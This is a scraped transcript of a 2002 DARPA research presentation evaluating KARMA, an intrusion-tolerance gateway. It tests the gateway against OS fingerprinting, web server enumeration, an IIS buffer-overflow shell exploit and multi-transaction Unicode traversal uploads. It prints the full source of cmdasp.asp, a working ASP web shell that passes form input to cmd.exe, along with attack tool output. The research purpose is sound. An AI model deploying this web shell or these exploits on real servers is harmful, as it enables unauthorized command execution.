Presentation is loading. Please wait.

Presentation is loading. Please wait.

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 1 Aegis Research Corporation KARMA Kinetic Application of Redundancy to Mitigate Attacks.

Published byBrandon Boyd Modified over 8 years ago

Similar presentations

Presentation on theme: "DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 1 Aegis Research Corporation KARMA Kinetic Application of Redundancy to Mitigate Attacks."— Presentation transcript:

1 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 1 Aegis Research Corporation KARMA Kinetic Application of Redundancy to Mitigate Attacks (Intrusion Tolerance Using Masking, Redundancy and Dispersion) DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Janet Lepanto William Weinstein The Charles Stark Draper Laboratory, Inc. Aegis Research Corporation ® Aegis Research Corporation

2 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 2 Aegis Research Corporation Overview Objectives and Assumptions Preliminary Test Results Validation Test Strategy

3 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 3 Aegis Research Corporation Objectives and Assumptions Objectives –Employ only a small set of trusted components to protect a large set of untrusted unmodified COTS servers and databases –Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers –Tolerate attacks whose specific signatures are not known a priori Assumptions –Attacker desires stealth so transaction rates will be relatively low –Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms –Exploitation of latent vulnerabilities will require more than a single transaction

4 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 4 Aegis Research Corporation Architecture External WAN External Firewall Data Base Transaction Mediator Gateway Switched IP Server (1) Server (N) Server (2) Configuration Manager Switched IP COTS Trusted Other

5 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 5 Aegis Research Corporation Mechanisms Gateway –Mask identities of origin server operating systems and web server applications –Distribute client transactions among the origin servers such that the client cannot predict which server will handle a transaction Configuration Manager –Monitor status of origin servers (via agent on each server) for anomalies –Reconfigure server to “clean” state if anomalies are detected Transaction Mediator –Log transactions to back-end database to support rollback recovery

6 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 6 Aegis Research Corporation KARMA Preliminary Testing Discovery –OS identification –Web server enumeration –Probing with malformed request Web Server Exploitation –Buffer overflow exploit to get shell command –Unicode exploit –Multi-transaction Unicode attack to plant executable –Smart multi-transaction attack with server agents active

7 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 7 Aegis Research Corporation OS identification attempts to guess the operating system and version of a remote system Freely available programs used for OS identification include xprobe (icmp based), queso, and nmap By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures KARMA masks OS identity of the Gateway Discovery (OS Identification) Gateway Configuration Manager Server (2) Server (1) Server (N)

8 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 8 Aegis Research Corporation Unable to determine OS of remote system Time required for this activity is relatively long OS identification run against KARMA public IP address Discovery (OS Identification) Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) Interesting ports on (192.80.95.40): Port State Service 80/tcp open http TCP Sequence Prediction: Class=random positive increments Difficulty=38245 (Worthy challenge) No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi). Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds [root@aegis With-KARMA]# nmap -sT -n -r –p 80 -P0 -O its.c4i.draper.com Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) Interesting ports on (192.80.95.40): Port State Service 80/tcp open http TCP Sequence Prediction: Class=random positive increments Difficulty=38245 (Worthy challenge) No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).

9 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 9 Aegis Research Corporation Web server enumeration attempts to remotely determine the currently running version of web server software In response to a HEAD command, web servers typically reveal the version of the software in the “Server” field of the HTTP response Successful enumeration allows a hacker to focus the attack against the specific web server software KARMA scrubs web server responses to mask the identity of the responding web server Removes specific identifying information (e.g., “Server” header) Removes server unique information such as E-tags Reformats error responses to mask server unique implementations Discovery (Web Server Enumeration) Gateway Configuration Manager Server (2) Server (1) Server (N)

10 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 10 Aegis Research Corporation Issue the HEAD command to the server “Server” field identifies the server as Microsoft-IIS/4.0 Probe web server directly Discovery (Web Server Enumeration) [root@mystic Without-KARMA]# nc 192.168.0.14 80 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://192.168.0.14/Default.htm Date: Fri, 04 Jan 2002 19:41:23 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT ETag: "804e5a95c5ec11:b84" Content-Length: 6783 Server: Microsoft-IIS/4.0 HEAD / HTTP/1.0

11 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 11 Aegis Research Corporation Issue the HEAD command to the server “Server” field no longer present in the HTTP response Probe web server via KARMA Discovery (Web Server Enumeration) [root@aegis With-KARMA]# nc its.c4i.draper.com 80 HTTP/1.1 200 OK Connection: close Date: Fri, 04 Jan 2002 22:40:28 GMT Accept-Ranges: bytes Content-Length: 6913 Content-Type: text/html Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT HEAD / HTTP/1.0

12 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 12 Aegis Research Corporation System often discloses information when responding to erroneous conditions Attackers can trigger such disclosure and use the information to create a blueprint of the target network Upon receiving a malformed request to an existing directory the web server responds with an error message that contains its internal IP address KARMA sanitizes error responses from the web servers and and then forwards them to the user Discovery (Probing with a Malformed Request) Gateway Configuration Manager Server (2) Server (1) Server (N)

13 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 13 Aegis Research Corporation The web server returns a “302 Object Moved” error Error message contains the internal IP address Issue “GET /html” directly to an origin server Discovery (Probing with a Malformed Request) HTTP/1.1 302 Object Moved Location: http://192.168.0.14/html/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: 141 Document Moved Object Moved This document may be found here [root@mystic Without-KARMA]# nc 192.168.0.14 80 GET /html HTTP/1.0 HTTP/1.1 302 Object Moved Location: http://192.168.0.14/html/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: 141 Document Moved Object Moved This document may be found here

14 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 14 Aegis Research Corporation Web server returns a “301 Moved Permanently” error Error message does not contain internal IP address Issue “GET /html” via KARMA Discovery (Probing with a Malformed Request) HTTP/1.1 301 Moved Permanently Connection: close Location: http://its.c4i.draper.com/html/ Content-Length: 254 301 - Moved Permanently http://its.c4i.draper.com/html/ [root@aegis With-KARMA]# nc its.c4i.draper.com 80 GET /html HTTP/1.0 HTTP/1.1 301 Moved Permanently Connection: close Location: http://its.c4i.draper.com/html/ Content-Length: 254 301 - Moved Permanently http://its.c4i.draper.com/html/

15 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 15 Aegis Research Corporation Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit Exploit causes buffer overflow on the IIS web server which returns a command shell to attacker on TCP port 81 This command shell has administrator level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server Web Server Exploitation (Buffer Overflow) Gateway Configuration Manager Server (2) Server (1) Server (N)

16 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 16 Aegis Research Corporation Command shell returned from server “ver” command returns the version of windows Execute directly against server and listen for shell on port 81 Web Server Exploitation (Buffer Overflow) “ipconfig /all” reports the server’s network configuration

17 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 17 Aegis Research Corporation Unsuccessful, command shell is never returned Attack is thwarted Execute via KARMA and listen for shell on port 81 Web Server Exploitation (Buffer Overflow)

18 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 18 Aegis Research Corporation Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot “../” directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af) This vulnerability enables unauthenticated to access any known file or program on the web server Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials Web Server Exploitation (Unicode Exploit) Gateway Configuration Manager Server (2) Server (1) Server (N)

19 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 19 Aegis Research Corporation “dir c:\” reveals the contents of the root directory “ver” command returns the version of windows Execute Unicode attack directly against server Web Server Exploitation (Unicode Exploit)

20 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 20 Aegis Research Corporation “dir c:\” sent to server several times before success “ver” returns error message for every request Execute Unicode attack via KARMA Web Server Exploitation (Unicode Exploit)

21 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 21 Aegis Research Corporation A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions). For example, uploading a file line by line using the windows “echo” command Attacker uploads for exploit the web server. cmdasp.asp (exploit allows the attacker to execute commands with system level privileges) upload.asp (script allows an attacker to upload files via HTTP) KARMA dispersion makes multi-transaction attacks more difficult Increases the time required to exploit the web server Increases the attack signature and probability of detection Web Server Exploitation (Multi-Transaction) Gateway Configuration Manager Server (2) Server (1) Server (N)

22 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 22 Aegis Research Corporation Web Server Exploitation (Multi-Transaction) unicodeloader.pl uploads the file cmdasp.asp line by line utilizing the “echo” command in multiple Unicode strings cmdasp.asp – web script to exploit local windows vulnerability that enables the attacker to execute commands with system level privileges Attacker accesses cmdasp.asp with a web browser and enters commands

23 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 23 Aegis Research Corporation Web Server Exploitation (Multi-Transaction) Attack web server directly

24 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 24 Aegis Research Corporation Web Server Exploitation (Multi-Transaction) Attack web servers via KARMA

25 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 25 Aegis Research Corporation “cmdasp.asp” with KARMA 3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - " method="POST"> 23 - 25 - 28 - If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 - “cmdasp.asp” without KARMA 1 - 2 - <% 3 - Dim oScript 4 - Dim oScriptNet 5 - Dim oFileSys, oFile 6 - Dim szCMD, szTempFile 7 - On Error Resume Next 8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL") 9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 11 - szCMD = Request.Form(".CMD") 12 - If (szCMD <> "") Then 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 16 - End If 17 - %> 18 - 19 - 20 - " method="POST"> 21 - "> 22 - 23 - 24 - 25 - 26 - 27 - <% 28 - If (IsObject(oFile)) Then 29 - On Error Resume Next 30 - Response.Write Server.HTMLEncode(oFile.ReadAll) 31 - oFile.Close 32 - Call oFileSys.DeleteFile(szTempFile, True) 33 - End If 34 - %> 35 - 36 - Web Server Exploitation (Multi-Transaction) “cmdasp.asp” without KARMA 1 - 2 - <% 3 - Dim oScript 4 - Dim oScriptNet 5 - Dim oFileSys, oFile 6 - Dim szCMD, szTempFile 7 - On Error Resume Next 8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL") 9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 11 - szCMD = Request.Form(".CMD") 12 - If (szCMD <> "") Then 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 16 - End If 17 - %> 18 - 19 - 20 - " method="POST"> 21 - "> 22 - 23 - 24 - 25 - 26 - 27 - <% 28 - If (IsObject(oFile)) Then 29 - On Error Resume Next 30 - Response.Write Server.HTMLEncode(oFile.ReadAll) 31 - oFile.Close 32 - Call oFileSys.DeleteFile(szTempFile, True) 33 - End If 34 - %> 35 - 36 - “cmdasp.asp” with KARMA 3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - " method="POST"> 23 - 25 - 28 - If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 -

26 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 26 Aegis Research Corporation An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking. Upload a line of the script and then recursively checks for success Create unique directory and “echo” first line of script Check unique directory for file size to verify successful upload If successful “echo” line two and continue process else retry first line Server Agent detects changes to origin server configuration Server stopped and taken out of service by Configuration Manager Rebuilt from trusted archive Returned to service Web Server Exploitation (KARMA Server Agents Active) Gateway Configuration Manager Server (2) Server (1) Server (N)

27 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 27 Aegis Research Corporation Web Server Exploitation (KARMA Server Agents Active) exploiting directory: C:\Inetpub\scripts\adv-uniloader uploading ASP section: sending line 1 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes. Advanced Unicode upload utility with error checking [root@aegis With-KARMA]# adv-uniloader.pl 192.80.95.40:80 cmdasp.asp First line successfully uploaded to server on first attempt Second line fails several times due to dispersion mechanism Agent identifies attack and shuts down server exploiting directory: C:\Inetpub\scripts\adv-uniloader uploading ASP section: sending line 1 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes. sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes. exploiting directory: C:\Inetpub\scripts\adv-uniloader uploading ASP section: sending line 1 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes. sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes. sending line 3 of 36 Checking directory for upload..

28 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 28 Aegis Research Corporation Web Server Exploitation (KARMA Server Agent Log) Server 4 Agent log file No anomalies detected by the Server Agent on server 4 Attack detected, stop server, refresh content to original data, and restart web service Attack remediated, server 4 back to normal operation in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0

29 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 29 Aegis Research Corporation 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0 1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0 1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1 1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0 1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 Web Server Exploitation (KARMA Configuration Manager Log) Configuration Manager log file Server agents reporting OK Problem identified by server 4, unauthorized file c:\inetpub\scripts\a dvuni\cmdasp.asp detected Server 4 back to normal operation, servers reporting OK 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0 1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0 1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1 1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0 1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0 1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0 1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1 1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0 1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0 1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0 1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1 1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0 1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0 1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0 1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0 1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0 1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0 1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

30 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 30 Aegis Research Corporation Summary of Preliminary Test Results Discovery –Scanning tools could not determine OS of Gateway Origin servers not directly exposed to OS scans –Probing to create web servers error responses failed to uncover web server type Web Server Exploitation –Buffer overflow of printing extension failed to return command shell –Execution of single string Unicode exploits slowed by dispersion mechanism KARMA architecture rendered some “pseudo shell commands” ineffective Exploit was able to return directory information –Multi-transaction file buildup thwarted by dispersion mechanism –Smart multi-transaction file buildup stopped by server agent

31 DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 31 Aegis Research Corporation Validation Test Strategy Controlled Vulnerability Testing Configure origin servers with known weaknesses Compare effect of attacks directly on server with same attack via KARMA Blind Red Team Testing Configure origin servers with latest security patches Give the Red team no information at all about the system Objective is to compromise the data base Targeted Red Team Testing Configure origin servers with latest security patches Inform the red team about the general architecture and operating strategy, but provide no details Objective is to compromise the data base

Download ppt "DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 1 Aegis Research Corporation KARMA Kinetic Application of Redundancy to Mitigate Attacks."

Similar presentations

Expose the Vulnerability Paul Hogan Ward Solutions.

Expose the Vulnerability Paul Hogan Ward Solutions.
Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.
DARPA OASIS PI Meeting – Santa Fe – July 24-27, 2001Slide 1 Aegis Research Corporation Not for Public Release Survivability Validation Framework for Intrusion.

DARPA OASIS PI Meeting – Santa Fe – July 24-27, 2001Slide 1 Aegis Research Corporation Not for Public Release Survivability Validation Framework for Intrusion.
DARPA ITS PI Meeting – Honolulu – July 17-21, 2000Slide 1 Aegis Research Corporation Intrusion Tolerance Using Masking, Redundancy and Dispersion DARPA.

DARPA ITS PI Meeting – Honolulu – July 17-21, 2000Slide 1 Aegis Research Corporation Intrusion Tolerance Using Masking, Redundancy and Dispersion DARPA.
Scanning CS391. Overview  The TCP protocol: quick overview  Scanning  Fingerprinting  OS Detection.

Scanning CS391. Overview  The TCP protocol: quick overview  Scanning  Fingerprinting  OS Detection.
Software Security Lecture 4 Fang Yu Dept. of MIS, National Chengchi University Spring 2011.

Software Security Lecture 4 Fang Yu Dept. of MIS, National Chengchi University Spring 2011.
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.

Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.
System and Network Security Practices COEN 351 E-Commerce Security.

System and Network Security Practices COEN 351 E-Commerce Security.
IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.

IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.

The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.
Definitions, Definitions, Definitions Lead to Understanding.

Definitions, Definitions, Definitions Lead to Understanding.
Configuring a Web Server. Overview  Understand how a Web server works  Install IIS (Internet Information Services) and Apache Web servers  Examine.

Configuring a Web Server. Overview  Understand how a Web server works  Install IIS (Internet Information Services) and Apache Web servers  Examine.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 8: Implementing and Managing Printers.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 8: Implementing and Managing Printers.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.

Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

Similar presentations

Ads by Google